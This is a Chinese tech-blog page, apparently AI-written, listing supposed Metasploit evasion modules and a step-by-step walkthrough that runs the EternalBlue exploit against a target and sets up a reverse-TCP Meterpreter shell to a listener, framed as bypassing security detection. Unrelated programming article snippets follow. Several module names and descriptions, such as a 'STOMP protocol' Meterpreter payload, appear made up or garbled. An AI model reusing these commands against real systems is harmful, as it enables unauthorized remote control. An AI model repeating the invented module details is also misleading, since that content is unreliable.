当前位置: 首页 > news >正文

metasploit/modules/evasion 有哪些模块,以及具体使用案例

news 2026/5/21 4:22:04

Metasploit框架的evasion模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion模块及其使用案例:

1. 通用Evasion模块

  • windows/meterpreter/reverse_tcp_rc4:使用RC4加密的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4
set LHOST 192.168.1.2
set LPORT 4444

  • windows/meterpreter/reverse_tcp_uuid:使用UUID生成器的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_uuid
set LHOST 192.168.1.2
set LPORT 4444

2. 编码和混淆Evasion模块

  • x86/shikata_ga_nai:使用Shikata Ga Nai算法进行XOR编码。

    set ENCODER x86/shikata_ga_nai

  • x86/countdown:使用递减计数器进行编码。

    set ENCODER x86/countdown

3. 特定平台Evasion模块

  • windows/x64/meterpreter/reverse_tcp_stomp:使用STOMP协议的反向TCP Meterpreter会话。

    set PAYLOAD windows/x64/meterpreter/reverse_tcp_stomp
set LHOST 192.168.1.2
set LPORT 4444

  • linux/x86/meterpreter/reverse_tcp_lzma:使用LZMA压缩的反向TCP Meterpreter会话。

    set PAYLOAD linux/x86/meterpreter/reverse_tcp_lzma
set LHOST 192.168.1.2
set LPORT 4444

使用案例

假设你想利用一个Windows漏洞来获取远程控制,并且希望绕过安全检测,你可以按照以下步骤操作:

  1. 选择合适的exploit模块

    use exploit/windows/smb/ms17_010_eternalblue

  2. 设置目标IP

    set RHOSTS 192.168.1.1

  3. 选择合适的payload模块

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4

  4. 设置本地监听地址和端口

    set LHOST 192.168.1.2
set LPORT 4444

  5. 运行模块

    run

注意事项

  • 使用这些模块时,请确保你有合法的权限和目的。
  • 避免在未经授权的系统上进行测试,以免违反法律或政策。

通过这些模块和案例,你可以生成绕过安全检测的有效载荷,从而提高渗透测试的成功率。

相关文章:

metasploit/modules/evasion 有哪些模块,以及具体使用案例

Metasploit框架的evasion模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion模块及其使用案例: 1. 通用Evasion模块 windows/meterpreter/reverse_tcp_rc4:使用RC4加密的反向TCP Meterpreter会话。 set PAYLOAD windows/meterpreter/reverse…...

编程日记 2024/11/1 18:56:06

网络安全入门文档-虚拟机配置篇

前言 虚拟机作为网络安全渗透测试中常见的工具。通常被用来安装kali系统 简单解释一下,目前操作系统分为三类 windows、linux、mac linux又有两个小类,分别是RedHat、Debian 而我们要安装的kali就是基于Debian的操作系统。 简单来说。虚拟机和系统是两个…...

编程日记 2024/11/1 18:52:02

class 041 最大公约数、同余原理

1. 辗转相除法 对下面的证明过程有什么问题和怀疑的直接随便找两个数字自己写一遍就行了. 1.1 利用辗转相除法计算最大公约数 直接记忆这段代码公式就行了(具体的证明过程直接去看左程云老师写的就行了). public static long gcd(long a, long b) { // Greatest Common Di…...

编程日记 2024/11/1 18:49:59

token的创建与解析,并配合拦截器使用

场景&#xff1a; 进行web应用开发时&#xff0c;往往需要对当前用户进行身份判断&#xff0c;此时可以使用token技术 1.导入依赖 <dependency><groupId>io.jsonwebtoken</groupId><artifactId>jjwt-impl</artifactId><scope>runtime<…...

编程日记 2024/11/1 18:47:57

Oracle 数据库历史备份数据恢复验证

Oracle ASM 管理的数据库历史备份数据恢复至单实例数据库 简介&#xff1a; 验证 ASM 管理的数据库的历史备份恢复至单实例数据库&#xff08;主要目的在于验证历史备份是否可用的一次恢复演练&#xff09; 一、恢复演练系统选择 根据数据库情况选择恢复测试的环境。 此次恢…...

编程日记 2024/11/1 18:46:56

【网络面积篇】TCP断开连接(笔记)

目录 一. 四次挥手 &#xff08;1&#xff09;过程描述 &#xff08;2&#xff09;为什么是四次挥手&#xff1f; 二、相关问题 1. 第一次挥手丢失了&#xff0c;会发生什么&#xff1f; 2. 第二次挥手丢失了&#xff0c;会发生什么&#xff1f; 补充&#xff1a;close …...

编程日记 2024/11/1 18:45:55

下跌多少才能涨回来?

文章目录 上涨下跌函数关系函数图形数学分析 上涨下跌函数关系 最近炒股很热&#xff0c;对于股票来说&#xff0c;有个很重要的参数涨跌幅&#xff0c;那么下跌多少才能涨回来&#xff1f;这个不需要太深的知识就可以计算出来&#xff0c;下跌和上涨不是等价的&#xff0c;下跌…...

编程日记 2024/11/1 18:42:53

【AAOS】【源码分析】CarSystemUI -- CarSystemBar

CarSystemBar不像Android手机那样固定的顶部“状态栏”和底部“导航栏”,而是将StatusBar和NavigationBar都统称为SystemBar,可以通过如下配置为每侧最多配置一个“系统栏”。 packages/apps/Car/SystemUI/res/values/config.xml<!-- Configure which system bars should …...

编程日记 2024/11/1 18:40:50

[供应链] 邀请招标

1.邀请招标定义 邀请招标(Invitation to Bid by Request) 也称为有限竞争性招标(limited Competitive Bidding)或选择性招标(Selected Bidding) 邀请招标的采购方式下&#xff0c;采购人(如政府机构、企业或其他组织)不是公开发布招标信息&#xff0c;而是根据供应商或承包商…...

编程日记 2024/11/1 18:37:46

VS2017+Qt5.12.9+CMake3.30.2编译VTK 9.2.0

一.准备工作 vs2017&#xff0c;QT&#xff0c;Cmake自行下载准备&#xff0c; VTK下载地址 1.官网下载 2.github下载 二.编译VTK源码 1.个人习惯创建以下目录&#xff0c;一个源码目录&#xff0c;Build为vs解决方案输出目录和编译输出以及中间生成文件目录 2.cmake基础…...

编程日记 2024/11/1 18:36:44

Java线程CPU占用过高如何排查?

使用ps命令查看java进程详细信息&#xff1a; ps aux | grep java使用top命令查看系统进程占用情况 top使用jstack命令导出Java进程的堆栈信息 jstack pid | grep tid -A 10 "java.lang.Thread.State" > gc.log找出占用cpu最高的线程id&#xff1a; top -Hp -d 1 …...

编程日记 2024/11/1 18:35:43

uniapp推送配置流程

Dcloud Dcloud注册账号 个推 了解即可 注册个推账号 ios配置流程 需配置含有推送的描述文件以及p8证书 配置推送证书 ios证书配置报技术错误&#xff08;参数错误&#xff09; TeamID-苹果开发者账号唯一的ID 安卓需配置多厂商 小米手机需要配置小米厂商 华为手机则需…...

编程日记 2024/11/1 18:34:41

qt QPicture详解

1、概述 QPicture类是Qt框架中的一个重要图形类&#xff0c;它主要用于记录和回放QPainter的绘图指令。这个类能够跨平台、无分辨率依赖地绘制图形&#xff0c;非常适合用于实现打印预览和图像操作等场景。QPicture可以将绘图操作序列化为一种独立于平台的格式&#xff0c;保存…...

编程日记 2024/11/1 18:32:39

ScheduledFuture Source Code Analysis

ScheduledFuture Overview is a delayed result-bearing action, 可以被cancel.通常是在ScheduledExecutorService里面schedule一个task, 然后ScheduledFuture是其task执行接受后的返回结果。 Code Analysis 继承于两个接口&#xff1a; extends Delayed, Future一些继承ch…...

编程日记 2024/11/1 18:31:38

【CSS】CSS 样式重置 (normalize.css 和 reset.css) 和通用样式配置

一般来说&#xff0c;每一个项目初始化阶段都需要样式重置和样式定制化。样式重置最常用的就是 normalize.css 和 reset.css 这两个文件。 他们的区别&#xff1a; Normalize.css更加注重保留有用的浏览器默认样式&#xff0c;仅修复浏览器之间的不一致性&#xff0c;适用于需…...

编程日记 2024/11/1 18:30:37

自动化机器学习(AutoML)详解

自动化机器学习&#xff08;AutoML&#xff09;详解 引言 在数据驱动的时代&#xff0c;将庞大的数据集转化为有价值的洞察和预测模型是众多组织的首要任务。然而&#xff0c;传统的机器学习流程复杂且耗时&#xff0c;包括数据预处理、特征选择、模型选择、调参以及模型评估…...

编程日记 2024/11/1 18:29:36

Linux: network:erspan0

文章目录 问题介绍生成时间:代码Linux引入后面NONE是怎么生成的问题 最近看到一个网卡是erspan0,不知道是做什么用的: # ip -d link show erspan0 7: erspan0@NONE: <BROADCAST,MULTICAST> mtu 1450 qdisc noop state DOWN mode DEFAULT group default qlen 10000...

编程日记 2024/11/1 18:28:35

第11课 计算思维

从二级考试开始&#xff0c;计算思维基本上以编程题的形式考察。为了避免一看就会&#xff0c;一写就废的情况&#xff0c;需要我们加强编程练习&#xff0c;把学到的知识&#xff0c;通过实战练习&#xff0c;变成自己的本领。 同一道题&#xff0c;一般会有多种解决方法&…...

编程日记 2024/11/1 18:22:30

ACL, ACL Workshop, ACL Findings 解释

ACL&#xff08;Annual Conference of the Association for Computational Linguistics&#xff09;是自然语言处理&#xff08;NLP&#xff09;领域的顶级会议之一&#xff0c;但确实有多个与ACL相关的会议和出版物&#xff0c;具体如下&#xff1a; ACL Main Conference&…...

编程日记 2024/11/1 18:21:29

《使用Gin框架构建分布式应用》阅读笔记:p272-p306

《用Gin框架构建分布式应用》学习第15天&#xff0c;p272-p306总结&#xff0c;总35页。 一、技术总结 1.TDD(test-driven development) 虽然经常看到TDD这个属于&#xff0c;从本人的工作经历看&#xff0c;实际开发中用得相对较少。 2.unitest(单元测试) go语言开发中&a…...

编程日记 2024/11/1 18:20:28

COMTool图表插件使用教程:实时数据可视化与曲线绘制完整指南

COMTool图表插件使用教程&#xff1a;实时数据可视化与曲线绘制完整指南 【免费下载链接】COMTool Cross platform communicate assistant(Serial/network/terminal tool)&#xff08; 跨平台 串口调试助手 网络调试助手 终端工具 linux windows mac Raspberry Pi &#xff09;…...

编程新知 2026/5/21 4:05:09

3步打造高效macOS菜单栏:Hidden Bar深度使用指南

3步打造高效macOS菜单栏&#xff1a;Hidden Bar深度使用指南 【免费下载链接】hidden An ultra-light MacOS utility that helps hide menu bar icons 项目地址: https://gitcode.com/gh_mirrors/hi/hidden 作为macOS用户&#xff0c;你是否曾为菜单栏图标拥挤不堪而烦恼…...

编程新知 2026/5/21 3:56:53

CARTGen-IR: Synthetic Tabular Data Generation for Imbalanced Regression——基于CART的表格数据不平衡回归合成采样方法

一、研究问题与背景 1.1 问题定义 不平衡回归&#xff1a;在连续目标变量中&#xff0c;极端值&#xff08;高值或低值&#xff09;样本稀少&#xff0c;导致模型偏向预测平均值&#xff0c;忽略重要极端情况。 应用场景&#xff1a;极端天气预测、海面温度异常、药物敏感性检…...

编程新知 2026/5/21 3:48:25

杰理微蓝牙芯片AC696系列入门

1.文章背景 此篇文章以ac696n_soundbox_sdk_v1.7.0版本进行入门讲解&#xff1a; 写这篇文章的目的是因为自己在尝试入门杰理微的时候遇到了好多的问题点&#xff0c;想尝试用买到的开发板来驱动一颗LED闪烁却一直没有按自己想象的逻辑成功跑出效果&#xff0c;在网上到处翻找手…...

编程新知 2026/5/21 3:44:21

告别枯燥理论!用Quartus II和LPM_ROM手把手带你玩转FPGA正弦波音乐盒

用FPGA演奏音乐&#xff1a;基于Quartus II的数字音乐盒实战指南 当技术遇上艺术&#xff0c;冰冷的电路也能唱出温暖的旋律。今天我们将打破传统FPGA实验的刻板印象&#xff0c;用一块开发板和几行代码&#xff0c;打造一个会唱歌的数字音乐盒。这不是普通的波形发生器&#x…...

编程新知 2026/5/21 3:12:56

别再自己写CNN了!用TensorFlow 2.3和MobileNetV2,15分钟搞定水果识别模型(附完整代码)

15分钟构建高精度水果识别模型&#xff1a;基于TensorFlow 2.3与MobileNetV2的迁移学习实战 在计算机视觉领域&#xff0c;图像分类任务往往需要复杂的模型架构和大量训练数据。但对于大多数实际应用场景&#xff08;如智能零售、农业分拣或家庭健康管理&#xff09;&#xff0…...

编程新知 2026/5/21 3:02:10

当流程图XML“损坏”时:手把手教你用Activiti API解析与修复BPMN文件

当BPMN文件遭遇“数据灾难”&#xff1a;Activiti深度修复实战指南 凌晨三点&#xff0c;服务器警报突然响起——核心业务流程引擎拒绝加载最新上传的BPMN文件。这不是简单的格式错误&#xff0c;而是一个从老旧系统迁移来的、经过多次手工编辑的流程定义文件。作为技术负责人&…...

编程新知 2026/5/21 2:59:51

PB 级自动驾驶数据秒级检索:Apache Doris 统一多模态数据平台实践

导读&#xff1a;多模态数据正成为企业核心资产&#xff0c;但规模化管理仍具挑战。自动驾驶在 PB 级图像、点云、视频等数据治理中积累了可复用经验。本文介绍某公司以 Apache Doris 统一标签、元数据、全文和向量检索&#xff0c;将查询从分钟级提升至秒级。 多模态数据正在成…...

编程新知 2026/5/21 2:17:38

阿里云服务器上fastText安装踩坑记:从C++11报错到模型量化压缩的完整避坑指南

阿里云ECS实战&#xff1a;fastText从编译报错到模型量化的全流程解决方案 当你在阿里云ECS上部署fastText模型时&#xff0c;是否遇到过那个令人头疼的"C11编译错误"&#xff1f;这仅仅是开始——内存占用过高、磁盘空间不足、推理速度慢等问题会接踵而至。本文将带…...

编程新知 2026/5/21 2:08:56

AI Agent 艺术创作能力探索

AI Agent 艺术创作能力探索:从生成式工具到自主创作主体的范式跃迁 关键词 AI Agent、生成式艺术、多模态创作、自主创作系统、计算美学、大模型推理、人机协同创作 摘要 本文从第一性原理出发,系统拆解AI Agent艺术创作的底层逻辑、技术架构、实现机制与产业价值。我们将…...

编程新知 2026/5/21 1:04:43